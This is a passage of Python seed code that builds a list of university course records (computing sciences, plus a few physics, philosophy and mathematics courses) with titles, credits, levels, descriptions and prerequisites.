'\n\t\t\t\t\t\t\t'mail systems enhancement; access to remote file systems; integration of '\n\t\t\t\t\t\t\t'remote resources such as components of the Web into applications; security; '\n\t\t\t\t\t\t\t'data compression and encryption; transport protocols; network addressing and '\n\t\t\t\t\t\t\t'routing; LAN and MAN medium access control; bridging; wireless and mobile '\n\t\t\t\t\t\t\t'networking; evolution of network technology on the Internet; multi-media '\n\t\t\t\t\t\t\t'protocols.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301 and CSC 8410'))\n\ncourses.append(models.Course(course = 'CSC 8580',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Network Management and Performance',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Monitoring and management of computer networks and network '\n\t\t\t\t\t\t\t'services; SNMP, CMIS, CMIP network management protocols and services; '\n\t\t\t\t\t\t\t'Management Information Base (MIB) development; performance analysis including '\n\t\t\t\t\t\t\t'queuing models; comparison of channel access protocols; other related topics '\n\t\t\t\t\t\t\t'as selected by the class. 
This course is frequently run as a seminar requiring '\n\t\t\t\t\t\t\t'a significant paper or project, consistent class preparation and participation.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8530 and CSC 8560'))\n\ncourses.append(models.Course(course = 'CSC 8600',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Object-Oriented Design and Programming',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Introduces the theoretical and practical issues underlying the '\n\t\t\t\t\t\t\t'object-oriented paradigm, including classes, encapsulation, inheritance and '\n\t\t\t\t\t\t\t'polymorphism. Primary topics also include object-oriented analysis and design, '\n\t\t\t\t\t\t\t'databases and technology transfer. The use of an object-oriented programming '\n\t\t\t\t\t\t\t'language, such as Java or C++, is an integral part of the course. Problems '\n\t\t\t\t\t\t\t'involving program design and implementation will be assigned. The student may '\n\t\t\t\t\t\t\t'be required to write a research paper and/or give an in-class presentation.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301 and CSC 8410'))\n\ncourses.append(models.Course(course = 'CSC 8700',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'System Programming in UNIX and C',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'The UNIX operating system: command interpreters, shell programming, '\n\t\t\t\t\t\t\t'process structure, file system, utilities like grep, sed, awk, and perl. C '\n\t\t\t\t\t\t\t'programming: file processing, libraries, program environment, system calls.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301 and CSC 8410'))\n\ncourses.append(models.Course(course = 'CSC 8800',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Applied Computer Science I',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Mathematical analysis, probability, statistics, optimization, '\n\t\t\t\t\t\t\t'queuing theory, digital signal processing; software engineering; UNIX, C, C++.',\n\t\t\t\t\t\t\tprerequisites = 'Permission of Instructor'))\n\ncourses.append(models.Course(course = 'CSC 8820',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Applied Computer Science III',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Client-user services; computer networking; communications link '\n\t\t\t\t\t\t\t'dynamics; astrodynamics.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8810'))\n\ncourses.append(models.Course(course = 'CSC 9010',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Special Topics',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Advanced elective study of topics of current interest and '\n\t\t\t\t\t\t\t'importance in the computer field. 
May be repeated for credit if topics '\n\t\t\t\t\t\t\t'are different.',\n\t\t\t\t\t\t\tprerequisites = 'Varies with the topic'))\n\ncourses.append(models.Course(course = 'CSC 9080',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Thesis Continuation',\n\t\t\t\t\t\t\tcredits = 0,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Continuation beyond the first semester for students who '\n\t\t\t\t\t\t\t'have registered for the thesis (CSC 9030).',\n\t\t\t\t\t\t\tprerequisites = 'CSC 9030'))\n\ncourses.append(models.Course(course = 'CSC 1030',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Problem Solving with Computers',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Using the microcomputer as a problem solving tool; system '\n\t\t\t\t\t\t\t'use; general purpose language programming; spreadsheet analysis and '\n\t\t\t\t\t\t\t'modeling; retrieving information from the Internet; strengths and weaknesses '\n\t\t\t\t\t\t\t'of computer based problem solutions.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1040',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computing with Images',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Image processing as an introduction to broader computing concepts; '\n\t\t\t\t\t\t\t'computational approaches to image processing and representation; multimedia tools.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'PHY 2601',\n\t\t\t\t\t\t\tdepartment = 'Physics',\n\t\t\t\t\t\t\ttitle = 'Computational Phy Lab I',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'Computational Physics',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1052',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Algorithms and Data Structures II',\n\t\t\t\t\t\t\tcredits = 4,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Object-oriented design: inheritance, interfaces, polymorphism; problem '\n\t\t\t\t\t\t\t'analysis; recursion; abstract data types; dynamically linked structures; linear data '\n\t\t\t\t\t\t\t'structures: stacks, queues, lists, vectors; sorting and searching; event-driven '\n\t\t\t\t\t\t\t'programming; graphical user interfaces.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1051 or ECE 1620'))\n\ncourses.append(models.Course(course = 'CSC 9000',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Guided Study',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Faculty directed study for one or a small number of students on a topic '\n\t\t\t\t\t\t\t'of mutual interest. 
Requires permission of the faculty sponsor and the director of '\n\t\t\t\t\t\t\t'the graduate program.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1300',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Discrete Structures',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Mathematical concepts that support computer science: sets, functions, '\n\t\t\t\t\t\t\t'relations, combinatorics, recurrences, Boolean logic, mathematical proofs, matrices, '\n\t\t\t\t\t\t\t'graphs and trees.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1600',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Operating Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'System software design and implementation; process and resource '\n\t\t\t\t\t\t\t'management; concurrency, scheduling, and deadlock; memory management; file systems '\n\t\t\t\t\t\t\t'and security.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2400 or ECE 2042'))\n\ncourses.append(models.Course(course = 'CSC 1700',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Analysis of Algorithms',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Efficiency classifications and mathematical analysis of recursive '\n\t\t\t\t\t\t\t'and nonrecursive algorithms. Major algorithm design techniques: brute force, '\n\t\t\t\t\t\t\t'divide-and-conquer, decrease-and-conquer, transform-and-conquer, space and time '\n\t\t\t\t\t\t\t'tradeoffs, greedy approach, dynamic programming, backtracking and branch-and-bound. '\n\t\t\t\t\t\t\t'Introduction to NP-completeness, approximation algorithms. Applications to a wide '\n\t\t\t\t\t\t\t'variety of computational problems: sorting, searching, string processing, graphs, '\n\t\t\t\t\t\t\t'arithmetic, linear algebra.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2053'))\n\ncourses.append(models.Course(course = 'CSC 2053',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Platform Based Computing',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Course is project driven. Topics include identifying platform '\n\t\t\t\t\t\t\t'facilities and constraints, event driven programming, MVC pattern, client/server '\n\t\t\t\t\t\t\t'considerations, security-performance-accessibility issues, web/mobile programming, '\n\t\t\t\t\t\t\t'and application programmer interfaces.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052'))\n\ncourses.append(models.Course(course = 'CSC 2993',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Internship in Computing',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Internship in computer science open to second semester sophomores '\n\t\t\t\t\t\t\t'and above. 
Most likely, intern will participate in computer system development, '\n\t\t\t\t\t\t\t'maintenance, or evaluation in an environment which supports sound software '\n\t\t\t\t\t\t\t'engineering techniques.',\n\t\t\t\t\t\t\tprerequisites = 'Junior standing and 3.0 overall GPA'))\n\ncourses.append(models.Course(course = 'ECE 8471',\n\t\t\t\t\t\t\tdepartment = 'Electrical and Computer Engineering',\n\t\t\t\t\t\t\ttitle = 'Software Reliability',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Introduction to concepts of software reliability within the context '\n\t\t\t\t\t\t\t'of software systems development. The course will be useful to managers who require '\n\t\t\t\t\t\t\t'a broad understanding of the topic as well as to software designers, programmers and '\n\t\t\t\t\t\t\t'testers who may need to apply these concepts in detail. Topics: a selection of '\n\t\t\t\t\t\t\t'classical software reliability models. In addition, some of the broader issues '\n\t\t\t\t\t\t\t'impacting software reliability, such as software design and testing, will be studied.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'ECE 8429',\n\t\t\t\t\t\t\tdepartment = 'Electrical and Computer Engineering',\n\t\t\t\t\t\t\ttitle = 'Topics in Intelligent Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = ' ',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 4170',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Theory of Computation',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Finite automata and regular expressions; push down automata and '\n\t\t\t\t\t\t\t'context-free grammars; Turing machines; Church\\'s thesis; computability; '\n\t\t\t\t\t\t\t'NP-completeness.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1700'))\n\ncourses.append(models.Course(course = 'CSC 4200',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Advanced Algorithms and Complexity',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Greedy algorithms, divide-and-conquer; dynamic programming; '\n\t\t\t\t\t\t\t'backtracking; branch-and-bound; linear and integer programming; Fast Fourier '\n\t\t\t\t\t\t\t'Transforms; probabilistic algorithms; NP-complete problems and approximation '\n\t\t\t\t\t\t\t'methods.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1700'))\n\ncourses.append(models.Course(course = 'CSC 4280',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Parallel Algorithms and Architecture',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Design and analysis of parallel algorithms for arithmetic, matrix '\n\t\t\t\t\t\t\t'operations, sorting, simulation, combinatorial and graph problems, and Fast Fourier '\n\t\t\t\t\t\t\t'Transforms; taxonomies of parallel architectures; interconnection networks, meshes, '\n\t\t\t\t\t\t\t'trees, and hypercubes; scalability and speed-up.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1700 and CSC 2405'))\n\ncourses.append(models.Course(course = 'CSC 4490',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Data Warehousing and Mining',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Tools and techniques, theory and practice for storage and effective '\n\t\t\t\t\t\t\t'use of massive data 
sets.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 4480 and (CSC 2300 or MAT 2310 or MAT 4310)'))\n\ncourses.append(models.Course(course = 'CSC 4550',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Expert and Knowledge Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Knowledge representation, uncertainty, automated knowledge acquisition, '\n\t\t\t\t\t\t\t'practical aspects of implementing expert systems.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1051'))\n\ncourses.append(models.Course(course = 'CSC 4600',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Distributed Processing Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Data concurrency; distributed file systems and databases; distributed '\n\t\t\t\t\t\t\t'operating systems; security; interprocess communication; directory services; process '\n\t\t\t\t\t\t\t'migration; process vulnerability to partial failure.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2405'))\n\ncourses.append(models.Course(course = 'CSC 4700',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Software Engineering',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Management and production of software systems; the software life cycle; '\n\t\t\t\t\t\t\t'software design techniques and methodologies; participation in a team software '\n\t\t\t\t\t\t\t'development project.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052'))\n\ncourses.append(models.Course(course = 'CSC 4790',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Senior Projects',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Capstone course centered around a semester long software development '\n\t\t\t\t\t\t\t'or research project; project planning; requirements elicitation and specification; '\n\t\t\t\t\t\t\t'teamwork; oral presentations required of all students.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 4700'))\n\ncourses.append(models.Course(course = 'CSC 5900',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Seminar in Computing',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Study and discussion of selected topics in computing with presentations '\n\t\t\t\t\t\t\t'by individual students. May be repeated for credit if topics are different.',\n\t\t\t\t\t\t\tprerequisites = 'Varies with the topic'))\n\ncourses.append(models.Course(course = 'CSC 5940',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Topics in Information Science',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Lecture presentation of selected topics in information science. May be '\n\t\t\t\t\t\t\t'repeated for credit if topics are different.',\n\t\t\t\t\t\t\tprerequisites = 'Varies with the topic'))\n\ncourses.append(models.Course(course = 'CSC 5993',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Independent Study',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Reading, research and/or projects in a selected area of computer '\n\t\t\t\t\t\t\t'science under the direction of a member of the staff. 
May be repeated for credit.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8810',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Applied Computer Science II',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Software engineering: object-oriented analysis and design, database '\n\t\t\t\t\t\t\t'management, graphical user interfaces, system engineering.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8800'))\n\ncourses.append(models.Course(course = 'CSC 8100',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Technology for Human Organizations',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Leading-edge technologies and their applications in a variety of '\n\t\t\t\t\t\t\t'organizational settings. Presumes literacy in basic computer applications: word '\n\t\t\t\t\t\t\t'processing, desktop publishing, spreadsheets and communications.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8500',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Formal Grammars and Programming Language Theory',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Machines; nondeterminism; simulation; finite machines and regular '\n\t\t\t\t\t\t\t'languages; grammars; stack, counter, and tape machines; computability.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301 and CSC 8310'))\n\ncourses.append(models.Course(course = 'CSC 8505',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Compiler Construction',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Finite state methods for lexical and syntactical analysis; '\n\t\t\t\t\t\t\t'symbol-table construction, run-time code organization for block-structured '\n\t\t\t\t\t\t\t'languages, intermediate code generation, and pseudo-object machines; LR(k) and '\n\t\t\t\t\t\t\t'LL(k) parsers. Programming assignments and exercises are given.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301 and CSC 8310'))\n\ncourses.append(models.Course(course = 'CSC 8520',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Artificial Intelligence',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Problem-solving methods; knowledge representation; search; '\n\t\t\t\t\t\t\t'predicate calculus; automated theorem proving; natural language processing.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301'))\n\ncourses.append(models.Course(course = 'CSC 8550',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Concepts of Data Communications',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Analog and digital transmission; media; communication channels; '\n\t\t\t\t\t\t\t'digital IDN carriers: T1, T3, SONET. 
Asynchronous and synchronous transmission; '\n\t\t\t\t\t\t\t'link protocols; multiplexing; switching: circuit and packet; voice and data '\n\t\t\t\t\t\t\t'PBXs; X.25, frame relay, ATM, ISDN; local area networks; OSI model; routing '\n\t\t\t\t\t\t\t'and transport; management.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8400'))\n\ncourses.append(models.Course(course = 'CSC 8570',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'User/System Interface Design',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'The design and measurement of human-computer interfaces, with '\n\t\t\t\t\t\t\t'the objectives of developing models of user communities, summarizing current '\n\t\t\t\t\t\t\t'research in user-oriented design, defining design criteria for the user/system '\n\t\t\t\t\t\t\t'interface, and constructing test strategies for interactive software systems.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8590',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Advanced Software Engineering',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'In-depth coverage of software engineering topics such as: reuse, '\n\t\t\t\t\t\t\t'metrics, CASE tools, design methodologies, reengineering, experimentation, '\n\t\t\t\t\t\t\t'automatic programming, software safety, development environments, reliability '\n\t\t\t\t\t\t\t'theory, risk management, and standards. The student may be required to write a '\n\t\t\t\t\t\t\t'research paper and/or give an in-class presentation.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8540'))\n\ncourses.append(models.Course(course = 'CSC 8610',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Multimedia Technology',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Theory and practice of multimedia content, representation, '\n\t\t\t\t\t\t\t'compression, storage, and delivery. Content types include text, audio, images, '\n\t\t\t\t\t\t\t'graphics, animations, and video. Student projects and presentations are generally '\n\t\t\t\t\t\t\t'an integral part of the course.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8710',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Advanced System Programming',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'The UNIX kernel: architecture, inodes, process control, memory '\n\t\t\t\t\t\t\t'management, I/O subsystem. System calls in C: execution environment, memory '\n\t\t\t\t\t\t\t'management, terminal control, locking, file management, process management, '\n\t\t\t\t\t\t\t'interprocess communication. C libraries. Program development and debugging tools.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8700'))\n\ncourses.append(models.Course(course = 'CSC 8720',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'System Administration Concepts',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'UNIX login process. Standard root, device and user directories and '\n\t\t\t\t\t\t\t'files. File system construction and management. Disk status and partitions. '\n\t\t\t\t\t\t\t'Monitoring system performance. 
Networking and communication.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8700'))\n\ncourses.append(models.Course(course = 'CSC 8750',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Expert Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Knowledge representation and reasoning techniques; forward and '\n\t\t\t\t\t\t\t'backward chaining; semantic net and frame systems; uncertainty, automated knowledge '\n\t\t\t\t\t\t\t'acquisition; practical guidelines for implementing expert systems.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8520'))\n\ncourses.append(models.Course(course = 'CSC 9020',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Independent Study',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Individual research project in an advanced area of computer science, '\n\t\t\t\t\t\t\t'conducted under the guidance of a faculty member.
',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8520'))\n\ncourses.append(models.Course(course = 'CSC 9021',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Independent Study Continuation',\n\t\t\t\t\t\t\tcredits = 0,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Continuation beyond the first semester for students who have registered '\n\t\t\t\t\t\t\t'for the independent study (CSC 9020).',\n\t\t\t\t\t\t\tprerequisites = 'CSC 9020'))\n\ncourses.append(models.Course(course = 'CSC 9030',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Thesis',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Expanded independent study in which the student makes an original '\n\t\t\t\t\t\t\t'contribution to the computer science field.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 9020'))\n\ncourses.append(models.Course(course = 'CSC 8990',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Graduate Computing Practicum',\n\t\t\t\t\t\t\tcredits = 1,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Work experience in computing. CSC graduate program approval required '\n\t\t\t\t\t\t\t'for a specific work opportunity. Required for the practicum option of the MSCS degree.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 9020'))\n\ncourses.append(models.Course(course = 'PHI 2180',\n\t\t\t\t\t\t\tdepartment = 'Philosophy',\n\t\t\t\t\t\t\ttitle = 'Computer Ethics',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Codes of professional ethics, unauthorized access, ownership of software, '\n\t\t\t\t\t\t\t'and the social responsibility of computing professionals.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'MAT 4310',\n\t\t\t\t\t\t\tdepartment = 'Mathematics',\n\t\t\t\t\t\t\ttitle = 'Statistical Methods',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Data displays and summarization, probability distributions, point and '\n\t\t\t\t\t\t\t'interval estimation, hypothesis testing, categorical data analysis, regression and '\n\t\t\t\t\t\t\t'correlation.',\n\t\t\t\t\t\t\tprerequisites = 'MAT 1505'))\n\ncourses.append(models.Course(course = 'CSC 3080',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Information Security and Protection',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'Explores the criticality of protecting information\'s availability, '\n\t\t\t\t\t\t\t'accuracy, authenticity, confidentiality, and integrity. Analysis of topics to include '\n\t\t\t\t\t\t\t'redundancy, backup and recovery, business continuity, security technologies, and '\n\t\t\t\t\t\t\t'controls such as audit, change management and testing.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2400'))\n\ncourses.append(models.Course(course = 'CSC 9025',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Grand Challenges of Computing',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Individual or group research/development project involving an advanced '\n\t\t\t\t\t\t\t'area of computer science, conducted under the guidance of a faculty member.
